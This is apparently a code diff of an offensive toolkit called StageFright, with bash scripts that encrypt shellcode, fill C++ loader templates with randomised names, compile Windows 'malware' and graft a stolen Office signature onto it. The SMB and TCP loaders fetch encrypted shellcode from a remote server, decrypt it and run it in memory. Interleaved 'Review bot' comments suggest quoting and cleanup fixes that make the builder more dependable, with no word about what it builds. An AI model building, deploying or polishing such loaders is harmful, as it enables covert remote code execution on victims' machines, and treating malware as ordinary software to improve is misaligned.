+payload=$(cat "shell.txt")
+payloadnow=${payload#*;}
+payloadtoday=${payloadnow#*=}
+echo $payloadtoday > shell5.txt
+cp StageFright/SMBDLL/conv.py StageFright/SMBDLL/Resources/con.py
+perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i StageFright/SMBDLL/Resources/con.py
+sed -i "s/{/[/g" -i StageFright/SMBDLL/Resources/con.py
+sed -i "s/}/]/g" -i StageFright/SMBDLL/Resources/con.py
+sed -i "s/;//g" -i StageFright/SMBDLL/Resources/con.py
+python3 StageFright/SMBDLL/Resources/con.py
+#rm StageFright/SMBDLL/Resources/con.py
+mv payload.bin $SHELLCODEFILE
+sleep 2
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomE=$(cat shell.txt)
+sed -i "s/RandomE/$RandomE/g" StageFright/SMBDLL/Resources/template.cpp
+
+
+#Replace IP, PORT and SHELLCODEFILE
+sed -i "s/ENTRYPOINT/$ENTRYPOINT/g" StageFright/SMBDLL/Resources/template.cpp
+sed -i "s/SHAREFOLDER/$SHAREFOLDER/g" StageFright/SMBDLL/Resources/template.cpp
+sed -i "s/HOSTNAME/$HOSTNAME/g" StageFright/SMBDLL/Resources/template.cpp
+sed -i "s/SHELLCODEFILE/$SHELLCODEFILE/g" StageFright/SMBDLL/Resources/template.cpp
+#Replacing Values
+
+# Get Payload From URL Function
+
+#FindShare
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random1=$(cat shell.txt)
+sed -i "s/Random1/$Random1/g" StageFright/SMBDLL/Resources/template.cpp
+
+#pPayloadBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+Random2=$(cat shell.txt)
+sed -i "s/Random2/$Random2/g" StageFright/SMBDLL/Resources/template.cpp
+
+#sPayloadSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random3=$(cat shell.txt)
+sed -i "s/Random3/$Random3/g" StageFright/SMBDLL/Resources/template.cpp
+
+#bSTATE
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
+Random5=$(cat shell.txt)
+sed -i "s/Random5/$Random5/g" StageFright/SMBDLL/Resources/template.cpp
+
+#sSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-7} | head -n 1 > shell.txt
+Random6=$(cat shell.txt)
+sed -i "s/Random6/$Random6/g" StageFright/SMBDLL/Resources/template.cpp
+
+#hInternet
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random7=$(cat shell.txt)
+sed -i "s/Random7/$Random7/g" StageFright/SMBDLL/Resources/template.cpp
+
+#dwBytesRead
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-13} | head -n 1 > shell.txt
+Random8=$(cat shell.txt)
+sed -i "s/Random8/$Random8/g" StageFright/SMBDLL/Resources/template.cpp
+
+#pBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random9=$(cat shell.txt)
+sed -i "s/Random9/$Random9/g" StageFright/SMBDLL/Resources/template.cpp
+
+#PAYLOAD
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomA=$(cat shell.txt)
+sed -i "s/RandomA/$RandomA/g" StageFright/SMBDLL/Resources/template.cpp
+
+#Sleep Function
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomJ=$(cat shell.txt)
+sed -i "s/RandomJ/$RandomJ/g" StageFright/SMBDLL/Resources/template.cpp
+
+#AES KEY NAME
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+RandomK=$(cat shell.txt)
+sed -i "s/RandomK/$RandomK/g" StageFright/SMBDLL/Resources/template.cpp
+
+# Main Function
+
+#Bytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomB=$(cat shell.txt)
+sed -i "s/RandomB/$RandomB/g" StageFright/SMBDLL/Resources/template.cpp
+
+#Size
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomC=$(cat shell.txt)
+sed -i "s/RandomC/$RandomC/g" StageFright/SMBDLL/Resources/template.cpp
+
+#Compile
+
+echo -e ${yellow}"+++Compiling Malware+++"${clear}
+x86_64-w64-mingw32-g++ -shared -o $MALWARE StageFright/SMBDLL/Resources/template.cpp -lws2_32 -lntdll -static-libgcc -static-libstdc++ -Wl,--subsystem,windows -O2 -Wno-narrowing -fpermissive >/dev/null 2>&1
+echo ""
+sleep 2
+rm shell*
+echo -e ${yellow}"***Malware Compiled***"${clear}
+echo ""
+sleep 2
+echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
+echo ""
+sleep 2
+python3 StageFright/Resources/SigThief/sigthief.py -i StageFright/Resources/OfficeSetup.exe -t $MALWARE -o signed$MALWARE >/dev/null 2>&1
+mv signed$MALWARE $MALWARE
+echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
+echo ""
+
+
+
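Review bot: The cleanup step `rm shell*` is an unanchored glob in the caller's working directory, so besides the script's own scratch files it also deletes any unrelated file whose name begins with `shell`, including a `shellcode.bin` the user may have placed there as the input prompted for at the top; replace it with the explicit list the script actually creates, `rm -f -- shell.txt shell2.txt shell3.txt shell5.txt`. The closing status messages are also not tied to any outcome: the compiler and sigthief invocations discard their output and status with `>/dev/null 2>&1`, and there is no `set -e`, so `***Malware Compiled***` and `***Signature Added…***` print even when no file was produced and the subsequent `mv signed$MALWARE $MALWARE` then fails on a missing file. The final message should not describe the output as signed at all, since the bundled SigThief README states that a copied signature does not validate. Minor wording: the prompt text `Hosting Your Shellcode From'. ex:` carries a stray apostrophe.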

+ 4 - 0
StageFright/StageFright/StageFright/SMBDLL/conv.py

@@ -0,0 +1,4 @@
+buf=PAYVAL 
+payload = bytes(bytearray(buf))
+with open('payload.bin', 'wb') as f:
+    f.write(payload)

+ 252 - 0
StageFright/StageFright/StageFright/SMBDLL/template.cpp

@@ -0,0 +1,252 @@
+#include <windows.h>
+#include <winternl.h>
+#include <wchar.h>
+#include <winternl.h>
+#include <winbase.h>
+#include <winnt.h>
+#include <fileapi.h>
+#include <stdio.h>
+#include <stdint.h>
+#include <stdlib.h>
+#include <string.h>
+#include <wincrypt.h>
+#include <psapi.h>
+#include <tlhelp32.h>
+
+#pragma comment(lib, "crypt32.lib")
+#pragma comment(lib, "advapi32.lib")
+
+#ifndef NTSTATUS
+typedef LONG NTSTATUS;
+#endif
+
+#ifndef NT_SUCCESS
+#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
+#endif
+
+typedef NTSTATUS(WINAPI* _NtAllocateVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    ULONG_PTR ZeroBits,
+    PSIZE_T RegionSize,
+    ULONG AllocationType,
+    ULONG Protect);
+
+typedef NTSTATUS(WINAPI* _NtFreeVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG FreeType);
+
+typedef NTSTATUS(WINAPI* _NtProtectVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG NewProtect,
+    PULONG OldProtect);
+
+typedef NTSTATUS(WINAPI* _NtCreateThreadEx)(
+    OUT PHANDLE ThreadHandle,
+    IN ACCESS_MASK DesiredAccess,
+    IN LPVOID ObjectAttributes,
+    IN HANDLE ProcessHandle,
+    IN LPTHREAD_START_ROUTINE StartAddress,
+    IN LPVOID Parameter,
+    IN BOOL CreateSuspended,
+    IN ULONG StackZeroBits,
+    IN ULONG SizeOfStackCommit,
+    IN ULONG SizeOfStackReserve,
+    OUT LPVOID BytesBuffer);
+
+typedef NTSTATUS(WINAPI* _NtWaitForSingleObject)(
+    HANDLE ObjectHandle,
+    BOOLEAN Alertable,
+    PLARGE_INTEGER Timeout);
+
+typedef NTSTATUS(WINAPI* _NtClose)(
+    HANDLE Handle);
+
+DWORD WINAPI ThreadFunction(LPVOID lpParameter);
+
+void PrintError(const wchar_t* action) {}
+
+BOOL Random1(LPCWSTR szServer, LPCWSTR szFilePath, PBYTE* binaryData, SIZE_T* binarySize) {
+    BOOL operationSuccess = TRUE;
+    PBYTE allocatedMemory = NULL;
+
+    WCHAR szFullUNCPath[MAX_PATH];
+    swprintf_s(szFullUNCPath, MAX_PATH, L"\\\\%s\\%s", szServer, szFilePath);
+
+    HANDLE hFile = CreateFileW(szFullUNCPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+    if (hFile == INVALID_HANDLE_VALUE) {
+        operationSuccess = FALSE;
+    }
+    else {
+        DWORD fileSize = GetFileSize(hFile, NULL);
+        if (fileSize == INVALID_FILE_SIZE) {
+            operationSuccess = FALSE;
+        }
+        else {
+            SIZE_T allocationSize = fileSize;
+
+            _NtAllocateVirtualMemory pNtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtAllocateVirtualMemory");
+            NTSTATUS status = pNtAllocateVirtualMemory(
+                GetCurrentProcess(),
+                (PVOID*)&allocatedMemory,
+                0,
+                &allocationSize,
+                MEM_COMMIT | MEM_RESERVE,
+                PAGE_READWRITE);
+
+            if (!NT_SUCCESS(status)) {
+                operationSuccess = FALSE;
+            }
+            else {
+                DWORD bytesRead;
+                if (!ReadFile(hFile, allocatedMemory, fileSize, &bytesRead, NULL)) {
+                    operationSuccess = FALSE;
+                }
+
+                *binaryData = allocatedMemory;
+                *binarySize = bytesRead;
+            }
+        }
+
+        CloseHandle(hFile);
+    }
+
+    return operationSuccess;
+}
+
+BOOL Random2(const PBYTE BinaryData, SIZE_T DataSize) {
+    LPVOID pMemory = VirtualAlloc(NULL, DataSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+    if (pMemory == NULL) {
+        return FALSE;
+    }
+
+    memcpy(pMemory, BinaryData, DataSize);
+
+    _NtProtectVirtualMemory pNtProtectVirtualMemory = (_NtProtectVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtProtectVirtualMemory");
+    SIZE_T regionSize = DataSize;
+    ULONG oldProtect;
+    NTSTATUS status = pNtProtectVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        PAGE_NOACCESS,
+        &oldProtect);
+
+    if (!NT_SUCCESS(status)) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    status = pNtProtectVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        PAGE_EXECUTE_READ,
+        &oldProtect);
+
+    if (!NT_SUCCESS(status)) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    HANDLE hThread = CreateThread(NULL, 0, ThreadFunction, pMemory, CREATE_SUSPENDED, NULL);
+    if (hThread == NULL) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    ULONG suspendCount = ResumeThread(hThread);
+    if (suspendCount == (DWORD)-1) {
+        CloseHandle(hThread);
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    WaitForSingleObject(hThread, INFINITE);
+
+    _NtClose pNtClose = (_NtClose)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtClose");
+    status = pNtClose(hThread);
+
+    _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
+    status = pNtFreeVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        MEM_RELEASE);
+
+    return TRUE;
+}
+
+DWORD WINAPI ThreadFunction(LPVOID lpParameter) {
+    PBYTE BinaryData = (PBYTE)lpParameter;
+    typedef void (*FunctionPointer)();
+    FunctionPointer pFunction = (FunctionPointer)BinaryData;
+
+    pFunction();
+
+    return 0;
+}
+
+int Random3(char* Random4, unsigned int Random5, char* Random6, size_t Random6len) {
+    HCRYPTPROV hProv;
+    HCRYPTHASH hHash;
+    HCRYPTKEY hKey;
+
+    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+        return -1;
+    }
+    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
+        return -1;
+    }
+    if (!CryptHashData(hHash, (BYTE*)Random6, (DWORD)Random6len, 0)) {
+        return -1;
+    }
+    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
+        return -1;
+    }
+
+    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, Random4, &Random5)) {
+        return -1;
+    }
+
+    CryptReleaseContext(hProv, 0);
+    CryptDestroyHash(hHash);
+    CryptDestroyKey(hKey);
+
+    return 0;
+}
+
+char Random7[] = KEYVALUE
+
+extern "C" void CALLBACK ENTRYPOINT(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
+    LPCWSTR szServer = L"HOSTNAME";
+    LPCWSTR szFilePath = L"SHAREFOLDER\\SHELLCODEFILE";
+
+    PBYTE Random8;
+    SIZE_T Random8Size;
+
+    BOOL success = Random1(szServer, szFilePath, &Random8, &Random8Size);
+
+    if (success) {
+        Random3((char*)Random8, Random8Size, Random7, sizeof(Random7));
+
+        success = Random2(Random8, Random8Size);
+
+        _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
+        SIZE_T regionSize = Random8Size;
+        NTSTATUS status = pNtFreeVirtualMemory(
+            GetCurrentProcess(),
+            (PVOID*)&Random8,
+            &regionSize,
+            MEM_RELEASE);
+
+        LocalFree(Random8);
+    }
+
+    return success ? 0 : 1;
+}
+

+ 26 - 0
StageFright/StageFright/StageFright/TCP/Resources/aesencrypt.py

@@ -0,0 +1,26 @@
+# Red Team Operator course code template
+# payload encryption with AES
+# 
+# author: reenz0h (twitter: @SEKTOR7net)
+
+import sys
+from base64 import b64encode
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import pad
+from Crypto.Random import get_random_bytes
+import hashlib
+
+KEY = get_random_bytes(16)
+iv = 16 * b'\x00'
+cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
+
+try:
+    plaintext = open(sys.argv[1], "rb").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
+
+print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
+print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

+ 0 - 0
StageFright/StageFright/StageFright/TCP/Resources/con.py


+ 160 - 0
StageFright/StageFright/StageFright/TCP/Resources/template.cpp

@@ -0,0 +1,160 @@
+#include <winsock2.h>
+#include <ws2tcpip.h>
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <wincrypt.h>
+#pragma comment (lib, "crypt32.lib")
+#pragma comment (lib, "advapi32")
+#include <psapi.h>
+
+// Define the shellcode function signature
+typedef void (*mmsUbBZmpSL)();
+
+bool HSXaBzAEMsmM(const char* CSQpTfUWF, int qZHAiSObQH, const char* Random4, char*& ZqGOz, size_t& YcNnTdO) {
+    WSADATA wsaData;
+    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
+        return false;
+    }
+
+    SOCKET clientSocket = socket(AF_INET, SOCK_STREAM, 0);
+    if (clientSocket == INVALID_SOCKET) {
+        WSACleanup();
+        return false;
+    }
+
+    sockaddr_in serverAddress{};
+    serverAddress.sin_family = AF_INET;
+    serverAddress.sin_port = htons(qZHAiSObQH);
+    serverAddress.sin_addr.s_addr = inet_addr(CSQpTfUWF);
+
+    if (serverAddress.sin_addr.s_addr == INADDR_NONE) {
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    if (connect(clientSocket, (struct sockaddr*)&serverAddress, sizeof(serverAddress)) < 0) {
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    // Send the length of the file path first
+    size_t Random4Len = strlen(Random4);
+    send(clientSocket, reinterpret_cast<char*>(&Random4Len), sizeof(Random4Len), 0);
+
+    // Send the file path to the server
+    send(clientSocket, Random4, Random4Len, 0);
+
+    int fileSize;
+    int bytesRead = recv(clientSocket, reinterpret_cast<char*>(&fileSize), sizeof(fileSize), 0);
+    if (bytesRead != sizeof(fileSize)) {
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    fileSize = ntohl(fileSize);
+
+    // Receive and save the binary data in a dynamically allocated buffer
+    ZqGOz = new char[fileSize];
+    if (ZqGOz == nullptr) {
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    size_t totalSize = 0;
+    while (totalSize < fileSize) {
+        bytesRead = recv(clientSocket, ZqGOz + totalSize, fileSize - totalSize, 0);
+        if (bytesRead <= 0) {
+            delete[] ZqGOz;
+            closesocket(clientSocket);
+            WSACleanup();
+            return false;
+        }
+        totalSize += bytesRead;
+    }
+
+    // Close the socket
+    closesocket(clientSocket);
+
+    YcNnTdO = totalSize;
+
+    return true;
+}
+
+int tgLHLotnCNGU(char* YCFvYJweWXpxv, unsigned int YCFvYJweWXpxv_len, char* DGQygzYiTL, size_t DGQygzYiTLlen) {
+    HCRYPTPROV hProv;
+    HCRYPTHASH hHash;
+    HCRYPTKEY hKey;
+
+    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+        return -1;
+    }
+    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
+        return -1;
+    }
+    if (!CryptHashData(hHash, (BYTE*)DGQygzYiTL, (DWORD)DGQygzYiTLlen, 0)) {
+        return -1;
+    }
+    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
+        return -1;
+    }
+
+    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, YCFvYJweWXpxv, &YCFvYJweWXpxv_len)) {
+        return -1;
+    }
+
+    CryptReleaseContext(hProv, 0);
+    CryptDestroyHash(hHash);
+    CryptDestroyKey(hKey);
+
+    return 0;
+}
+
+char DGQygzYiTL[] =  { 0x88, 0x86, 0x7, 0x50, 0x68, 0x8d, 0xb7, 0xfb, 0x11, 0xb7, 0xdd, 0x16, 0x93, 0x87, 0x14, 0x20 };;
+
+int main() {
+    const char* CSQpTfUWF = "192.168.1.12";  // Replace with the actual server IP
+    int qZHAiSObQH = 8080;               // Replace with the actual server port
+    const char* Random4 = "invoice.txt";  // Replace with the actual file path on the server
+
+    char* ZqGOz;
+    size_t YcNnTdO;
+
+    if (HSXaBzAEMsmM(CSQpTfUWF, qZHAiSObQH, Random4, ZqGOz, YcNnTdO)) {
+        tgLHLotnCNGU((char*)ZqGOz, YcNnTdO, DGQygzYiTL, sizeof(DGQygzYiTL));
+
+        // Allocate executable memory with READ, WRITE permissions
+        LPVOID executableMemory = VirtualAlloc(NULL, YcNnTdO, MEM_COMMIT, PAGE_READWRITE);
+        if (executableMemory == NULL) {
+            delete[] ZqGOz;
+            return 1;
+        }
+
+        // Copy binary data to the executable memory
+        memcpy(executableMemory, ZqGOz, YcNnTdO);
+
+        // Change the protection to PAGE_EXECUTE_READ
+        DWORD oldProtect;
+        if (!VirtualProtect(executableMemory, YcNnTdO, PAGE_EXECUTE_READ, &oldProtect)) {
+            VirtualFree(executableMemory, 0, MEM_RELEASE);
+            delete[] ZqGOz;
+            return 1;
+        }
+
+        // Create a function pointer to the shellcode
+        mmsUbBZmpSL zkPPzcyaB = reinterpret_cast<mmsUbBZmpSL>(executableMemory);
+
+        // Call the shellcode function
+        zkPPzcyaB();
+    } else {
+        return 1;
+    }
+
+    return 0;
+}
+
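Review bot: This file is build output rather than source: TCP.sh begins with `cp StageFright/TCP/template.cpp StageFright/TCP/Resources/template.cpp` and then rewrites it in place with sed, so the committed copy — one concrete server IP, one 16-byte key literal (ending in a stray `;;`) and one set of randomised identifiers — is overwritten on the first run and only adds noise to the diff. The same applies to the sibling `Resources/con.py` and, as far as the diffstat shows, the prebuilt `malware.dll` under TCPDLL/Resources. Suggest a `.gitignore` entry for `StageFright/*/Resources/template.cpp` and `StageFright/*/Resources/con.py` and keeping only the placeholder templates under version control. Code review belongs on `TCP/template.cpp`, which is the same code with `Random*` placeholders.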

+ 189 - 0
StageFright/StageFright/StageFright/TCP/TCP.sh

@@ -0,0 +1,189 @@
+#!/bin/bash
+
+# Color variables
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+cat << "EOF"
+  ___   _____ _____   _____                            _           _ 
+ / _ \ |  ___/  ___| |  ___|                          | |         | |
+/ /_\ \| |__ \ `--.  | |__ _ __   ___ _ __ _   _ _ __ | |_ ___  __| |
+|  _  ||  __| `--. \ |  __| '_ \ / __| '__| | | | '_ \| __/ _ \/ _` |
+| | | || |___/\__/ / | |__| | | | (__| |  | |_| | |_) | ||  __/ (_| |
+\_| |_/\____/\____/  \____/_| |_|\___|_|   \__, | .__/ \__\___|\__,_|
+                                            __/ | |                  
+                                           |___/|_|                  
+ _____ _                       _   _____ _____ ______                
+/  ___| |                     | | |_   _/  __ \| ___ \               
+\ `--.| |_ __ _  __ _  ___  __| |   | | | /  \/| |_/ /               
+ `--. \ __/ _` |/ _` |/ _ \/ _` |   | | | |    |  __/                
+/\__/ / || (_| | (_| |  __/ (_| |   | | | \__/\| |                   
+\____/ \__\__,_|\__, |\___|\__,_|   \_/  \____/\_|                   
+                 __/ |                                               
+                |___/                                                
+ _____                    _   _                                      
+|  ___|                  | | (_)                                     
+| |____  _____  ___ _   _| |_ _  ___  _ __                           
+|  __\ \/ / _ \/ __| | | | __| |/ _ \| '_ \                          
+| |___>  <  __/ (__| |_| | |_| | (_) | | | |                         
+\____/_/\_\___|\___|\__,_|\__|_|\___/|_| |_|                        
+
+EOF
+
+echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
+echo ""
+read Shellcode
+echo ""
+echo -e ${green}"What's Your Server IP?"${clear}
+echo ""
+read HOSTNAME
+echo ""
+echo -e ${green}"Enter Your Port"${clear}
+echo ""
+read PORTY
+echo ""
+echo -e ${green}"Name Your Shellcode File. ex: invoice.txt"${clear}
+echo ""
+read SHELLCODEFILE
+echo ""
+echo -e ${green}"Name Your Malware! ex: malware.exe"${clear}
+echo ""
+read MALWARE
+echo ""
+cp StageFright/TCP/template.cpp StageFright/TCP/Resources/template.cpp
+echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
+echo ""
+sleep 2
+python3 StageFright/TCP/Resources/aesencrypt.py $Shellcode > shell.txt
+echo -e ${yellow}"***Encryption Completed***"${clear}
+echo ""
+cp shell.txt shell2.txt
+
+#Generate AES Key
+keys=$(cat "shell2.txt")
+cut -d 'p' -f1 shell2.txt > shell3.txt
+keys=$(cat shell3.txt)
+keysnow=${keys#*=}
+sed -i "s/KEYVALUE/$keysnow/g" StageFright/TCP/Resources/template.cpp
+
+#Generate AES Payload
+payload=$(cat "shell.txt")
+payloadnow=${payload#*;}
+payloadtoday=${payloadnow#*=}
+echo $payloadtoday > shell5.txt
+cp StageFright/TCP/conv.py StageFright/TCP/Resources/con.py
+perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i StageFright/TCP/Resources/con.py
+sed -i "s/{/[/g" -i StageFright/TCP/Resources/con.py
+sed -i "s/}/]/g" -i StageFright/TCP/Resources/con.py
+sed -i "s/;//g" -i StageFright/TCP/Resources/con.py
+python3 StageFright/TCP/Resources/con.py
+#rm StageFright/TCP/Resources/con.py
+mv payload.bin $SHELLCODEFILE
+sleep 2
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomE=$(cat shell.txt)
+sed -i "s/RandomE/$RandomE/g" StageFright/TCP/Resources/template.cpp
+
+
+#Replace IP, PORT and SHELLCODEFILE
+sed -i "s/PORTY/$PORTY/g" StageFright/TCP/Resources/template.cpp
+sed -i "s/HOSTNAME/$HOSTNAME/g" StageFright/TCP/Resources/template.cpp
+sed -i "s/SHELLCODEFILE/$SHELLCODEFILE/g" StageFright/TCP/Resources/template.cpp
+#Replacing Values
+
+# Get Payload From URL Function
+
+#FindShare
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random1=$(cat shell.txt)
+sed -i "s/Random1/$Random1/g" StageFright/TCP/Resources/template.cpp
+
+#pPayloadBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+Random2=$(cat shell.txt)
+sed -i "s/Random2/$Random2/g" StageFright/TCP/Resources/template.cpp
+
+#sPayloadSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random3=$(cat shell.txt)
+sed -i "s/Random3/$Random3/g" StageFright/TCP/Resources/template.cpp
+
+#bSTATE
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
+Random5=$(cat shell.txt)
+sed -i "s/Random5/$Random5/g" StageFright/TCP/Resources/template.cpp
+
+#sSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-7} | head -n 1 > shell.txt
+Random6=$(cat shell.txt)
+sed -i "s/Random6/$Random6/g" StageFright/TCP/Resources/template.cpp
+
+#hInternet
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random7=$(cat shell.txt)
+sed -i "s/Random7/$Random7/g" StageFright/TCP/Resources/template.cpp
+
+#dwBytesRead
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-13} | head -n 1 > shell.txt
+Random8=$(cat shell.txt)
+sed -i "s/Random8/$Random8/g" StageFright/TCP/Resources/template.cpp
+
+#pBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random9=$(cat shell.txt)
+sed -i "s/Random9/$Random9/g" StageFright/TCP/Resources/template.cpp
+
+#PAYLOAD
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomA=$(cat shell.txt)
+sed -i "s/RandomA/$RandomA/g" StageFright/TCP/Resources/template.cpp
+
+#Sleep Function
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomJ=$(cat shell.txt)
+sed -i "s/RandomJ/$RandomJ/g" StageFright/TCP/Resources/template.cpp
+
+#AES KEY NAME
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+RandomK=$(cat shell.txt)
+sed -i "s/RandomK/$RandomK/g" StageFright/TCP/Resources/template.cpp
+
+# Main Function
+
+#Bytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomB=$(cat shell.txt)
+sed -i "s/RandomB/$RandomB/g" StageFright/TCP/Resources/template.cpp
+
+#Size
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomC=$(cat shell.txt)
+sed -i "s/RandomC/$RandomC/g" StageFright/TCP/Resources/template.cpp
+
+#Compile
+
+echo -e ${yellow}"+++Compiling Malware+++"${clear}
+x86_64-w64-mingw32-g++ -o $MALWARE StageFright/TCP/Resources/template.cpp -static-libgcc -static-libstdc++ -lws2_32 -lole32 -lwbemuuid -O2 -Wno-narrowing -fpermissive >/dev/null 2>&1
+echo ""
+sleep 2
+rm shell*
+echo -e ${yellow}"***Malware Compiled***"${clear}
+echo ""
+sleep 2
+echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
+echo ""
+sleep 2
+python3 StageFright/Resources/SigThief/sigthief.py -i StageFright/Resources/OfficeSetup.exe -t $MALWARE -o signed$MALWARE >/dev/null 2>&1
+mv signed$MALWARE $MALWARE
+echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
+echo ""
+echo -e ${yellow}"***Edit And Run The TCP Server***"${clear}
+
+
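Review bot: `rm shell*` in the post-compile cleanup is an unanchored glob over the caller's current directory, not over the script's scratch files, so a user who follows the prompt's own example and passes a relative `shellcode.bin` from the working directory has their input deleted together with `shell.txt`…`shell5.txt`. The `fold -w ${1:-11}` pipelines have a related problem: `$1` is the script's first positional argument, so invoking the script with any argument silently overrides every identifier width at once, and a non-numeric one makes `fold` fail. Use a private scratch directory and fixed widths: `work=$(mktemp -d) && trap 'rm -rf -- "$work"' EXIT`, write the intermediate files under `"$work"`, and replace each `${1:-N}` with the literal `N`. The user-supplied values (`$Shellcode`, `$MALWARE`, `$SHELLCODEFILE`, `$HOSTNAME`) are also unquoted and pasted straight into `sed` patterns, so a path containing a space or `/` breaks the pipeline; quote them and use a delimiter such as `s|SHELLCODEFILE|$SHELLCODEFILE|g`.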

+ 4 - 0
